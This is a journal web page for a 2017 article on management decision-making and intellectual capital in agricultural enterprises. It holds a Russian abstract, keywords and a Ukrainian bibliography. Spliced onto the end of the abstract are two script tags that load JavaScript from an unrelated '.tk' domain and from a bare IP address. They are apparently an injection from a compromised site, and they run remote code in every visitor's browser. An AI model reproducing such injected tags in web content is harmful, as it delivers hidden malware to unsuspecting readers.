ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 658.7:338.432
Інноваційна діяльність та інтелектуальний капітал

Эффективность принятия управленческих решений в условиях интеллектуализации труда / Терещенко С.И. // Экономика АПК. - 2017. - № 1 - С. 74

В условиях процесса интеллектуализации труда особое значение приобретает проблема эффективности принятого управленческого решения, которое гарантирует выживание или успехи предприятию в условиях реализации управленческого труда всех категорий управленческих работников. Базовой функцией интеллектуального капитала является создание новой стоимости путем реализации предоставленных интеллектуальными ресурсами возможностей, то есть путем использования интеллектуального потенциала. Если интеллектуальный потенциал - это возможности, созданные интеллектуальными ресурсами, то интеллектуальный капитал - это реализованный (эффективно использованный) интеллектуальный потенциал. Можно утверждать, что роль интеллектуального капитала заключается в обеспечении путей трансформации потенциального синергизма в синергизм реальный, измеряемый в приумножении количества и улучшении качества создаваемых материальных и духовных благ. Целью статьи является анализ влияния интеллектуального капитала при принятии решений управленческими работниками результатов деятельности сельскохозяйственных предприятий, принимая при этом во внимание взаимосогласованность и взаимозависимость процессов формирования и использования управленческого персонала. Табл.: 1. Илл.: 1. Библиогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: управленческое решение, интеллектуальный труд, инновационно-интеллектуальная составляющая, управленческие работники, интегральный индекс инновационно-интеллектуальной составляющей, стратегическое мышление, интеллектуальная культура

Список использованных источников

 1. Апшай Н.І. Інтелектуалізація навчального процесу у ВНЗ в умовах розвитку інформатизації [Текст] / Н.І. Апшай // Проблеми фізичного виховання і спорту. - 2010. - №9. - С.3-5.
 2. Бутнік-Сіверський О.Б. Трансформація інтелектуальної власності інноваційний продукт [Текст] / О.Б. Бутнік-Сіверський // Інтелектуальний капітал. - 2003. - №5. - С.3-12.
 3. Василик А.В. Інтелектуалізація трудової діяльності в контексті формування та розвитку інтелектуального капіталу: автореф. дис.. канд. екон. наук: спец. 08.00.07 «Демографія, економіка праці, соціальна економіка і політика» [Текст] / А.В. Василик. - К., 2009. - 24 с.
 4. Грішнова О.А. Інтелектуалізація праці: українські проблеми на тлі світових тенденцій [Текст] / О. А. Грішнова // Україна: аспекти праці. - 2000. - №7. - С.24-27.
 5. Доронін А.В. Інтелектуалізація капіталу і освітні процеси виробничої організації [Текст] / А.В. Доронін // Экономика и управление. - 2006. - №4. - С.13-18.
 6. Другов О.О. Інтелектуалізація як фактор забезпечення економічного зростання в Україні [Текст] / О.О. Другов // Економічний форум. - 2012. - №2. - С.50-56.
 7. Іщук С.О. Інтелектуалізація як світова тенденція економічного розвитку [Текст] / С.О. Іщук // Вісн. Університету банківської справи Національного банку України. - 2011. - №1(10). - С.91-96.
 8. Петренко В.П. Інтелектуальні ресурси соціально-економічних систем: аспекти інноваційного управління: моногр. [Текст] / В.П. Петренко. - Івано-Франківськ: ПП. Курилюк В.Д., 2009. - 196 с.
 9. Сем’ян О.В. Інтелектуалізація людського капіталу підприємства [Текст] / О.В. Сем’ян // Вісн. Бердянського ун-ту менеджменту і бізнесу. - 2011. - №4(16) - С.141-145.
 10. Сем’янчук П.М. Проблеми інтелектуалізації праці в Україні та шляхи їх вирішення [Текст] / П.М. Сем’янчук // Наук. вісн. НЛТУ України. - 2008. - Вип.18.4 - С.215-225.
 11. Ситник Й.С. Передумови інтелектуалізації систем менеджменту підприємств [Текст] / Й.С. Ситник // Матеріали ІІІ-ої Міжнар. наук.-практ. конф. студентів, аспірантів та молодих вчених «Актуальні питання теорії та практики менеджменту» 21-22 берез. 2012 р. - Луганськ: ТОВ «Віртуальна реальність», 2012. - С.57-59.
 12. Україна: інтелект нації на межі століть [Текст]. - К.: Інформаційно-видавничий центр «Інтелект», 2000. - 508 с.
 13. Хаврова К.С. Інтелектуалізація як основа формування стратегії інноваційного розвитку підприємства / К.С. Хаврова [Електронний ресурс]. - Режим доступу: http://www.sworld.com.ua/index.php/uk/economy-312/innovation-economy.
 14. Шевченко Л.С. Інтелектуалізація освіти: сучасні виклики для України / Л.С. Шевченко [Електронний ресурс]. - Режим доступу: http://int-konf.org/konf062013/360-doktor-ekonomchnih-naukprofesor-shevchenko-l-s-ntelektualzacya-osvti-suchasn-vikliki-dlya-ukrayini.html.
Читать статью: e_apk_2017_1_12.pdf